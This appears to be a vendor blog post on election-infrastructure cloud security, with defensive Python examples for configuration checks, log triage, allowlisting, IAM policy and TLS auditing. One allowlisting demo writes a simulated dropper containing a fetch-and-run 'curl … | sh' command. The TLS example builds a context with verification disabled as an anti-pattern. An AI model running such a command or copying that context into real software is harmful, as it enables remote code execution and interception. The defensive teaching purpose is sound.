At the heart of any democracy is the power of the individual voter. When the trust surrounding that system is called into question, the populace's faith in that democracy begins to crumble. Although to some this may sound like hyperbole, voting systems are increasingly moving into the digital age, with the backend infrastructure supporting them running in public clouds. Skillful hackers do not typically attack voting machines directly (unless it's at DefCon) but rather probe for the weakest link in the election security chain. Common targets are the systems storing voter registration databases (VRDBs), ballot definition files (BDFs) or electronic pollbooks (e-Pollbooks). That said, it is the duty of election officials to ensure that they and their vendors are not only following best practices but also fully understand the public cloud's shared security responsibility model and the control, compliance and visibility gaps it presents. To that end, the RedLock Cloud Security Intelligence (CSI) team has developed its Top 10 List for Election Security Best Practices. While purposefully not exhaustive, election officials and their teams can use it as a starting point for ensuring their cloud-based systems are safe and secure.
“The journey of a thousand miles begins with the first step.” - Laozi
The Elections Infrastructure Information Sharing & Analysis Center (EI-ISAC) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) were created as threat prevention, protection and response forums for state and local governments. Created by the Center for Internet Security (CIS), these groups are instrumental to the health of democracy because they allow the state and local officials supporting the election process to share threat intelligence and train on cybersecurity threats. State and local leaders, as well as election administrators, need to make participating in these ISACs a priority, not only for their teams but also for themselves. Teams will know leaders are serious when active participation in these ISACs is included in yearly goals. These ISACs not only keep leaders and their staff informed, they also check the box for cybersecurity awareness and training.
With voting machines in a local district and the critical backend infrastructure supporting them running on Amazon Web Services (AWS), Google Cloud Platform (GCP) or Microsoft Azure, officials and their vendors need to take the time to fully understand each cloud service provider's (CSP) shared responsibility model. The providers do a stellar job securing what they are responsible for (the physical facilities, the hypervisors and the internals of their managed services), but everything built on top of that (identities and their permissions, service configuration, data, network rules, and patching of customer-managed instances) is the customer's job. State and local officials therefore need to map out clearly who is responsible, accountable, consulted and informed for each of the critical areas of security in the cloud.
Figure 1: Security Responsibility Matrix
The most straightforward way to accomplish this is to take the security responsibility matrix above and overlay a RACI chart on it. To illustrate what this might look like, we have created the example below.
Figure 2: Responsibility Assignment Matrix
Federal, state and local governments, as well as their vendors, are embracing public cloud computing because of the flexibility and cost reductions it affords them. However, both government and vendor security teams often struggle to keep track of assets and accurately identify risks in these dynamic environments. This was illustrated in 2017 when voting-equipment and election-services vendor Election Systems & Software (ES&S) left a now infamous AWS S3 bucket containing voter records exposed on the public Internet. Election officials and their vendors are strongly encouraged to invest in technologies that maintain a near-real-time inventory of all cloud assets together with their current and historical configurations, so that a bucket whose access policy was loosened last week is as visible as one created yesterday. Remember, it is impossible to secure what you don't know about.
CIS has created a number of platform-specific benchmarks that can be used to harden applications, cloud provider platforms (AWS and Azure; Google coming soon) and many of the operating systems and applications that will support election backend infrastructure. Organizations that standardize on CIS benchmarks greatly reduce their documentation burden and free critical cybersecurity staff to focus on governance and other activities. It is strongly recommended that a CIS benchmark be adopted for any cloud platform supporting the election process and, more importantly, that an automated system continuously check that the environment stays in compliance with it: a benchmark assessed once a year says nothing about the configuration drift that happens between assessments. When relying on third-party vendors, ensure that your contracts require them to follow these standards as well.
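The following is an added example (not RedLock's or CIS's code) of what "an automated system that keeps systems in compliance" looks like at its core: a set of checks evaluated over a snapshot of cloud configuration. The snapshot, bucket names, security-group IDs and the role ARN are all constructed for the example. The security-group checks correspond to controls 4.1 and 4.2 of the CIS AWS Foundations Benchmark v1.2 (no 0.0.0.0/0 ingress to SSH or RDP); the bucket check looks for the ES&S failure mode, a world-readable S3 bucket, whether it arises from a public ACL grant or from a wildcard-principal bucket policy.

```python
"""Automated checks in the spirit of the CIS AWS Foundations Benchmark.

Added example, not RedLock's or CIS's code. SNAPSHOT is a constructed, simplified
rendering of what an inventory tool pulls from the AWS APIs (bucket ACL grants,
bucket policy statements, security-group ingress rules); all names are made up.
"""
import ipaddress

SNAPSHOT = {
    "s3_buckets": [
        {   # private bucket: owner-only ACL, policy scoped to one role
            "name": "county-bdf-archive",
            "acl_grants": [{"grantee": "OWNER", "permission": "FULL_CONTROL"}],
            "policy": {"Statement": [{"Effect": "Allow",
                                      "Principal": {"AWS": "arn:aws:iam::111122223333:role/BdfBuilder"},
                                      "Action": "s3:GetObject",
                                      "Resource": "arn:aws:s3:::county-bdf-archive/*"}]},
        },
        {   # the ES&S failure mode: an ACL grant to AllUsers
            "name": "vrdb-export-2017",
            "acl_grants": [{"grantee": "OWNER", "permission": "FULL_CONTROL"},
                           {"grantee": "http://acs.amazonaws.com/groups/global/AllUsers", "permission": "READ"}],
            "policy": None,
        },
        {   # same outcome via a wildcard-principal bucket policy
            "name": "epollbook-sync",
            "acl_grants": [{"grantee": "OWNER", "permission": "FULL_CONTROL"}],
            "policy": {"Statement": [{"Effect": "Allow", "Principal": "*",
                                      "Action": "s3:GetObject",
                                      "Resource": "arn:aws:s3:::epollbook-sync/*"}]},
        },
    ],
    "security_groups": [
        {"id": "sg-0a1b", "ingress": [{"proto": "tcp", "from": 22, "to": 22, "cidr": "10.20.0.0/16"}]},
        {"id": "sg-0c2d", "ingress": [{"proto": "tcp", "from": 3389, "to": 3389, "cidr": "0.0.0.0/0"}]},
        {"id": "sg-0e3f", "ingress": [{"proto": "-1", "from": 0, "to": 65535, "cidr": "::/0"}]},
    ],
}

PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
ADMIN_PORTS = {22: "SSH", 3389: "RDP"}  # CIS AWS Foundations v1.2 controls 4.1 and 4.2


def _principal_is_anyone(principal):
    """True for Principal "*" or {"AWS": "*"}; AWS treats both as anonymous access."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def s3_public_reasons(bucket):
    """Return why a bucket is world-readable; an empty list means not public by ACL or policy."""
    reasons = []
    for grant in bucket.get("acl_grants", []):
        if grant["grantee"] in PUBLIC_GRANTEES:
            reasons.append(f"ACL grants {grant['permission']} to {grant['grantee'].rsplit('/', 1)[-1]}")
    for stmt in (bucket.get("policy") or {}).get("Statement", []):
        # Only the clear case is flagged: an Allow to any principal with no Condition narrowing it.
        if stmt.get("Effect") == "Allow" and _principal_is_anyone(stmt.get("Principal")) and "Condition" not in stmt:
            reasons.append(f"bucket policy allows {stmt.get('Action')} to any principal")
    return reasons


def sg_open_admin_ports(group):
    """Ingress rules that expose SSH/RDP (or every port) to the whole Internet."""
    findings = []
    for rule in group.get("ingress", []):
        if ipaddress.ip_network(rule["cidr"]).prefixlen != 0:   # only 0.0.0.0/0 and ::/0 count
            continue
        for port, name in ADMIN_PORTS.items():
            if rule["proto"] in ("-1", "tcp") and rule["from"] <= port <= rule["to"]:
                findings.append(f"{name} ({port}/tcp) open to {rule['cidr']}")
    return findings


def run_checks(snapshot):
    """Evaluate every asset; returns (control, resource, detail) tuples for an auditor or ticketing system."""
    findings = []
    for bucket in snapshot["s3_buckets"]:
        for reason in s3_public_reasons(bucket):
            findings.append(("S3 bucket not publicly accessible", bucket["name"], reason))
    for group in snapshot["security_groups"]:
        for reason in sg_open_admin_ports(group):
            findings.append(("CIS AWS 4.1/4.2: no 0.0.0.0/0 ingress to admin ports", group["id"], reason))
    return findings


if __name__ == "__main__":
    for control, resource, detail in run_checks(SNAPSHOT):
        print(f"FAIL  {resource:<20} {control}: {detail}")
```

Run on a schedule against the inventory tool's output, the findings list becomes the drift report: a bucket that passes today and fails tomorrow after a PutBucketAcl call is exactly what the historical configuration record should surface.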
Figure 3: Illustration of the different areas of logging in public cloud platforms.
The cloud introduces an additional layer of logging at the cloud infrastructure level (see Figure 3) that has no equivalent on-prem: every API call against the provider's control plane (AWS CloudTrail, Azure Activity Log, GCP Cloud Audit Logs) is recorded, which greatly increases the volume and verbosity of logs. The CSI team does not recommend attempting to funnel all cloud events directly into a security information and event management (SIEM) tool, as this is typically cost-prohibitive under events-per-second (EPS) licensing. Instead, IT and security teams should use the cloud's native storage for log warehousing and rely on an in-cloud third-party platform to filter for noteworthy events. Of equal importance, but often very difficult with native cloud provider tools, are logs detailing network traffic both between the cloud environment and the Internet (north/south) and within the cloud environment (east/west); on AWS these come from VPC Flow Logs, which record accepted and rejected flows per network interface but no packet contents. Given the sheer volume of logs, it is critical that the in-cloud tool correlate configuration, user activity and network traffic data (the CSI team's approach applies machine learning to connect those dots). Given the interconnected nature of public cloud and election ecosystems, it is critical that no logs be left unmonitored.
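As an added example (not RedLock's code), here is the kind of filtering the text recommends doing in-cloud before anything reaches the SIEM, run over constructed samples of the two log sources discussed: CloudTrail records for the control plane and VPC Flow Log lines for north/south and east/west traffic. The account ID, interface IDs, addresses, user names and the subnet policy (only the 10.20.1.0/24 app subnet may reach the 10.20.2.0/24 database subnet on port 5432) are assumptions made for the example; the CloudTrail field names and the version-2 flow-log field layout are the real ones.

```python
"""Triage of cloud-layer logs: CloudTrail (API/control plane) and VPC Flow Logs (network).

Added example, not RedLock's code. The records and flow-log lines are constructed and
trimmed to the fields the rules use; account ID, ENIs, addresses and names are made up.
"""
import ipaddress

CLOUDTRAIL_EVENTS = [
    {"eventTime": "2018-03-05T14:02:11Z", "eventName": "ConsoleLogin", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"type": "Root", "arn": "arn:aws:iam::111122223333:root"},
     "additionalEventData": {"MFAUsed": "No"}},
    {"eventTime": "2018-03-05T14:05:40Z", "eventName": "DescribeInstances", "sourceIPAddress": "10.20.1.15",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/ops-alice"}},
    {"eventTime": "2018-03-05T14:07:03Z", "eventName": "AuthorizeSecurityGroupIngress",
     "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/contractor-bob"},
     "requestParameters": {"groupId": "sg-0c2d"}},
    {"eventTime": "2018-03-05T14:09:55Z", "eventName": "PutBucketAcl", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/contractor-bob"},
     "requestParameters": {"bucketName": "vrdb-export-2017"}},
]

# Default VPC Flow Log (version 2) layout:
# version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
FLOW_LOG_LINES = """\
2 111122223333 eni-0a1b 198.51.100.23 10.20.1.15 51234 22 6 12 1480 1520258400 1520258460 ACCEPT OK
2 111122223333 eni-0a1b 10.20.1.15 10.20.2.40 40512 5432 6 80 12400 1520258400 1520258460 ACCEPT OK
2 111122223333 eni-0c2d 10.20.5.99 10.20.2.40 40999 5432 6 3 180 1520258400 1520258460 ACCEPT OK
2 111122223333 eni-0a1b 203.0.113.9 10.20.1.15 44444 3389 6 1 60 1520258400 1520258460 REJECT OK
2 111122223333 eni-0a1b 10.20.1.15 203.0.113.250 43210 443 6 30 5000 1520258400 1520258460 ACCEPT OK
"""

# API calls that change the security posture and should always reach a human.
CHANGE_EVENTS = {"AuthorizeSecurityGroupIngress", "PutBucketAcl", "PutBucketPolicy", "DeleteTrail",
                 "StopLogging", "CreateUser", "AttachUserPolicy", "PutUserPolicy"}
NORTH_SOUTH_WATCH = {22: "SSH", 3389: "RDP", 5432: "PostgreSQL", 1433: "MSSQL"}
# East/west policy assumed for the example: only the app subnet may reach the database subnet's port.
APP_SUBNET = ipaddress.ip_network("10.20.1.0/24")
DB_SUBNET = ipaddress.ip_network("10.20.2.0/24")
DB_PORT = 5432
# RFC 1918 ranges spelled out: ipaddress's is_private also counts the 198.51.100.0/24 and
# 203.0.113.0/24 documentation ranges used above as "private", which would hide the Internet sources.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    return any(ip in net for net in INTERNAL)


def triage_cloudtrail(events):
    """Return (eventTime, actor ARN, reasons) for records worth a human's attention."""
    findings = []
    for ev in events:
        reasons = []
        ident = ev.get("userIdentity", {})
        if ident.get("type") == "Root":
            reasons.append("root account used")
        if ev["eventName"] == "ConsoleLogin" and ev.get("additionalEventData", {}).get("MFAUsed") != "Yes":
            reasons.append("console login without MFA")
        if ev["eventName"] in CHANGE_EVENTS:
            reasons.append(f"security-relevant change: {ev['eventName']} {ev.get('requestParameters', {})}")
        if reasons:
            findings.append((ev["eventTime"], ident.get("arn"), reasons))
    return findings


def triage_flows(text):
    """Return (srcaddr, dstaddr, dstport, reason) for accepted flows that violate the two policies above."""
    findings = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 14 or f[0] != "2" or f[12] != "ACCEPT":
            continue   # NODATA/SKIPDATA records and rejected traffic are not actionable here
        src, dst, dport = ipaddress.ip_address(f[3]), ipaddress.ip_address(f[4]), int(f[6])
        if not is_internal(src) and dport in NORTH_SOUTH_WATCH:
            findings.append((f[3], f[4], dport, f"north/south: Internet host reached {NORTH_SOUTH_WATCH[dport]}"))
        elif is_internal(src) and dst in DB_SUBNET and dport == DB_PORT and src not in APP_SUBNET:
            findings.append((f[3], f[4], dport, "east/west: database reached from outside the app subnet"))
    return findings


if __name__ == "__main__":
    for when, who, why in triage_cloudtrail(CLOUDTRAIL_EVENTS):
        print(when, who, "; ".join(why))
    for src, dst, port, why in triage_flows(FLOW_LOG_LINES):
        print(f"{src} -> {dst}:{port}  {why}")
```

The four CloudTrail records produce three findings (the DescribeInstances read is noise) and the five flow records produce two, which is the ratio that makes storing everything but forwarding only the filtered set affordable. The east/west rule is the one native tooling rarely gives you for free: it needs a statement of which subnets are supposed to talk to which, and that statement has to come from the asset inventory.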
In its simplest form, application whitelisting (now more often called allowlisting) is the process of defining which applications are expressly permitted to run on a system: if an application that is not on the whitelist attempts to execute, it is blocked. It is a seldom-used control that, when used effectively, drastically reduces the impact of ransomware and other cyber incidents, because the payload an attacker drops is not on the list and never runs. Election officials and their technology teams would be wise to ensure that all critical infrastructure supporting election systems uses application whitelisting, with rules keyed to file hashes or publisher signatures rather than file paths, since a path-based rule allows anything an attacker manages to write to an approved location. For further information on application whitelisting, we recommend reading NIST Special Publication 800-167, Guide to Application Whitelisting.
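An added example, not RedLock's code and not an enforcement agent, that shows only the allowlisting decision and why keying it on content hashes matters. The "executables" are temporary files created inside the demo, and the scenario (an approved tally tool overwritten in place, a second script dropped beside it) is constructed.

```python
"""Hash-based application allowlisting decisions, in the terms NIST SP 800-167 uses.

Added example, not RedLock's code and not a real enforcement agent: it shows the decision
logic only. The 'executables' are temporary files created by demo(); the scenario is constructed.
"""
import hashlib
import os
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_allowlist(approved_paths):
    """Golden-image step: record the content hash of every approved executable."""
    return {sha256_file(p): os.path.basename(p) for p in approved_paths}


def decide_by_hash(path, allowlist):
    """Allow execution only when the file's current content hash is on the list."""
    return "ALLOW" if sha256_file(path) in allowlist else "DENY"


def decide_by_path(path, approved_paths):
    """Weaker path-only rule: whatever sits at an approved path may run."""
    approved = {os.path.realpath(p) for p in approved_paths}
    return "ALLOW" if os.path.realpath(path) in approved else "DENY"


def _write(path, data):
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Build a list from two approved tools, then simulate two attacks; returns every decision."""
    with tempfile.TemporaryDirectory() as d:
        tally, sync = os.path.join(d, "tally"), os.path.join(d, "pollbook-sync")
        _write(tally, b"#!/bin/sh\necho counting ballots\n")
        _write(sync, b"#!/bin/sh\necho syncing e-pollbook\n")
        approved = [tally, sync]
        allowlist = build_allowlist(approved)

        # Attack 1: the approved tally binary is overwritten in place (same path, new content).
        _write(tally, b"#!/bin/sh\necho encrypting everything\n")
        # Attack 2: a new script is dropped next to the approved ones.
        dropper = os.path.join(d, "update.sh")
        _write(dropper, b"#!/bin/sh\ncurl http://203.0.113.5/x | sh\n")

        return {
            "trojaned tally, hash rule": decide_by_hash(tally, allowlist),
            "trojaned tally, path rule": decide_by_path(tally, approved),
            "dropped script, hash rule": decide_by_hash(dropper, allowlist),
            "dropped script, path rule": decide_by_path(dropper, approved),
            "untouched sync, hash rule": decide_by_hash(sync, allowlist),
        }


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{verdict:5} {case}")
```

Both rule types stop the dropped script; only the hash rule stops the tool that was replaced in place, which is the ransomware and supply-chain case the text is worried about. The cost is that every legitimate patch changes the hash, so the allowlist has to be regenerated as part of the image build rather than maintained by hand.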
While admittedly not new, swift patching remains one of the most effective methods for reducing the risk of cyber incidents affecting election systems. Research by RedLock's Cloud Security Intelligence team shows that 24% of organizations have high-severity patches missing in their public cloud environments. Don't let your critical voting infrastructure fall into this category. No matter how responsibility is split in your organization, it is critical that OS and application patches are tested and then quickly deployed to production systems; in the cloud this is often best done by rebuilding the machine image and redeploying it rather than patching long-lived instances in place, which also keeps the running fleet consistent with the hardened baseline.
The principle of least privilege has been around for centuries; its formal application to computing is comparatively recent, dating to the 1970s. Radically reduced administrative privileges, combined with application whitelisting, remain two of the most powerful and most under-used tools for combating cyber attacks. In practical terms, if a contractor is being used to create ballot definition files (BDFs), their access should be expressly limited to the systems and storage where the BDFs live, with only the actions the work requires, and the accounts providing their remote access should be time-limited: if the contract is for one year, the Identity and Access Management (IAM) system should automatically enforce account expiration at the one-year mark rather than relying on someone remembering to remove the account.
Weak passwords are routinely used to breach networks, and the prevalence of data breaches has produced many password dumps that attackers replay against other systems. While not without its own risks, multi-factor authentication (MFA) remains one of the surest ways to add immediate defense in depth to the critical election infrastructure supporting our democracy. The CSI team recommends that MFA be enforced on every system in the ecosystem supporting the election process. There are many forms of MFA, some stronger than others (SMS-based codes are on the weaker side because they can be intercepted or redirected through SIM swapping; hardware tokens, especially FIDO/U2F keys that bind the authentication to the site's origin and so resist phishing, are the strongest), but what matters most is that some type of MFA be implemented for every user with elevated privileges. The CSI team also recommends that election officials ensure vendors are contractually required to use MFA and that the contract language also requires annual third-party testing of these controls.
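The contractor scenario from the least-privilege point and the MFA requirement from this one can be expressed in a single IAM policy. The following is an added example (not RedLock's code, and not a full IAM implementation): the policy documents are constructed, the bucket name, contract end date (2019-03-01) and principal names are assumptions, and the evaluator implements only the subset of IAM semantics the policy uses (default deny, an explicit Deny wins, * and ? wildcards, and the Bool, DateLessThan and DateGreaterThan condition operators). The aws:MultiFactorAuthPresent and aws:CurrentTime condition keys are real IAM keys.

```python
"""Least-privilege, time-boxed, MFA-gated access as an IAM policy, with a small evaluator.

Added example, not RedLock's code. The policies are constructed; the evaluator covers only
Allow/Deny, '*' and '?' wildcards and the Bool / DateLessThan / DateGreaterThan operators,
not the full IAM evaluation logic (no resource policies, SCPs or permission boundaries).
"""
import re
from datetime import datetime, timezone

# What the text recommends for a BDF contractor: one bucket, the needed actions only, MFA
# required, and a hard expiry matching the contract's end (assumed here to be 2019-03-01).
CONTRACTOR_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["s3:GetObject", "s3:PutObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::county-bdf-archive", "arn:aws:s3:::county-bdf-archive/*"],
        "Condition": {
            "Bool": {"aws:MultiFactorAuthPresent": "true"},
            "DateLessThan": {"aws:CurrentTime": "2019-03-01T00:00:00Z"},
        },
    }],
}

# The anti-pattern: every S3 action on every bucket, no conditions. Shown for contrast.
BROAD_POLICY = {"Version": "2012-10-17",
                "Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}]}


def _as_list(x):
    return x if isinstance(x, list) else [x]


def _glob(pattern, value, ignore_case=False):
    """IAM-style matching: '*' matches any run, '?' one character, everything else literal."""
    rx = "^" + "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern) + "$"
    return re.match(rx, value, re.IGNORECASE if ignore_case else 0) is not None


def _parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _conditions_hold(cond, ctx):
    """Every operator/key pair must hold; a missing context key or unknown operator fails closed."""
    for op, pairs in (cond or {}).items():
        for key, want in pairs.items():
            have = ctx.get(key)
            if have is None:
                return False
            if op == "Bool" and str(have).lower() != str(want).lower():
                return False
            elif op == "DateLessThan" and not have < _parse_time(want):
                return False
            elif op == "DateGreaterThan" and not have > _parse_time(want):
                return False
            elif op not in ("Bool", "DateLessThan", "DateGreaterThan"):
                return False
    return True


def is_allowed(policy, action, resource, ctx):
    """Default deny; an explicit Deny beats any Allow; otherwise any matching Allow grants access."""
    allowed = False
    for stmt in policy["Statement"]:
        if not any(_glob(a, action, ignore_case=True) for a in _as_list(stmt["Action"])):
            continue   # action names are case-insensitive in IAM
        if not any(_glob(r, resource) for r in _as_list(stmt["Resource"])):
            continue   # resource ARNs are case-sensitive
        if not _conditions_hold(stmt.get("Condition"), ctx):
            continue
        if stmt["Effect"] == "Deny":
            return False
        allowed = True
    return allowed


def utc(year, month, day):
    return datetime(year, month, day, tzinfo=timezone.utc)


def contractor_context(mfa, when):
    """The request context as IAM would populate it for the contractor's session."""
    return {"aws:MultiFactorAuthPresent": mfa, "aws:CurrentTime": when}


if __name__ == "__main__":
    bdf = "arn:aws:s3:::county-bdf-archive/precinct-12.bdf"
    for label, ctx in (("MFA, during contract", contractor_context(True, utc(2018, 9, 1))),
                       ("no MFA, during contract", contractor_context(False, utc(2018, 9, 1))),
                       ("MFA, after contract", contractor_context(True, utc(2019, 6, 1)))):
        print(f"{label:25} -> {is_allowed(CONTRACTOR_POLICY, 's3:GetObject', bdf, ctx)}")
```

The expiry lives in the policy itself, so it does not depend on an offboarding ticket being actioned, and the MFA condition turns a leaked long-lived credential into a much smaller problem. The broad policy passes every request the scoped one rejects, including reads of the VRDB export the contractor has no business touching.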
Encryption is not a security panacea, but when implemented properly it can be the last line of defense during a breach. The first thing to encrypt is all data in transit. While in the past it was considered acceptable to let traffic pass in the clear on internal "trusted networks", this is no longer the case in the public cloud, where your traffic traverses shared, multi-tenant infrastructure you do not control. All traffic entering and exiting your cloud services should be encrypted with TLS (1.2 or later; SSL and TLS 1.0/1.1 are deprecated and should be disabled) or IPsec, and "encrypted" should be verified: certificates validated and old protocol versions refused, not merely a listener on port 443. Data residing on your cloud services should also be encrypted at both the disk and database levels. While encryption is an excellent tool in any election official's arsenal, it is only as good as your key protection strategy. The CSI team recommends the use of hardware security modules (HSMs) to control and manage encryption keys and secrets. Cloud service providers offer these as managed key-management services backed by HSMs, and as dedicated HSMs for organizations that need exclusive control of their keys, and it is recommended that they be used for a complete in-cloud encryption solution.
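An added example, not RedLock's code, of what "verified" should mean for a client connecting to election backend services over TLS: a Python ssl context that refuses anything older than TLS 1.2 and validates the certificate chain and hostname, beside the kind of no-verification context that too much glue code ships with, and an audit function (an assumed helper, not a standard-library API) that reports the difference.

```python
"""Verified TLS for a client: TLS 1.2 or newer, chain validation and hostname checking,
enforced in the socket context rather than assumed.

Added example, not RedLock's code. audit_context() is an assumed helper name; the findings
it reports are the ones a reviewer would raise against a weak context.
"""
import ssl


def hardened_client_context():
    """Client context that refuses SSLv3 and TLS 1.0/1.1 and validates the server certificate."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)   # check_hostname=True, CERT_REQUIRED by default
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2    # SSL and TLS 1.0/1.1 are deprecated
    ctx.load_default_certs()                        # trust the platform CA store
    return ctx


def legacy_client_context():
    """The 'it just works' context seen in too much glue code: no verification at all."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode may become CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    try:
        ctx.minimum_version = ssl.TLSVersion.TLSv1   # accept old protocol versions if the build allows it
    except (ValueError, ssl.SSLError):
        pass                                          # OpenSSL built without TLS 1.0: keep the default
    return ctx


def audit_context(ctx):
    """Return the weaknesses in an SSLContext; an empty list means it passes."""
    findings = []
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append(f"minimum protocol version is {ctx.minimum_version.name}; require TLSv1_2 or newer")
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("certificate verification disabled (verify_mode is not CERT_REQUIRED)")
    if not ctx.check_hostname:
        findings.append("hostname checking disabled (check_hostname is False)")
    return findings


if __name__ == "__main__":
    for name, ctx in (("hardened", hardened_client_context()), ("legacy", legacy_client_context())):
        print(name, "->", audit_context(ctx) or ["OK"])
```

The legacy context still produces an encrypted connection, which is why "it's on HTTPS" is not verification: without chain and hostname checks any on-path attacker can terminate the session with their own certificate, and with TLS 1.0 permitted a downgrade costs them nothing. The same three properties (minimum version, chain validation, name matching) are what to look for in the server-side listener configuration and in any vendor's connection code.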
True democracy requires that voters trust the election process from beginning to end. It is the duty of election officials to ensure that they and their vendors are not only following security best practices but also fully understand the control, compliance and visibility gaps that exist when using public cloud platforms. By adopting the 10 steps provided and continuously measuring their cybersecurity programs against them, federal, state and local governments can courageously fight, and win, against determined nation-state attackers.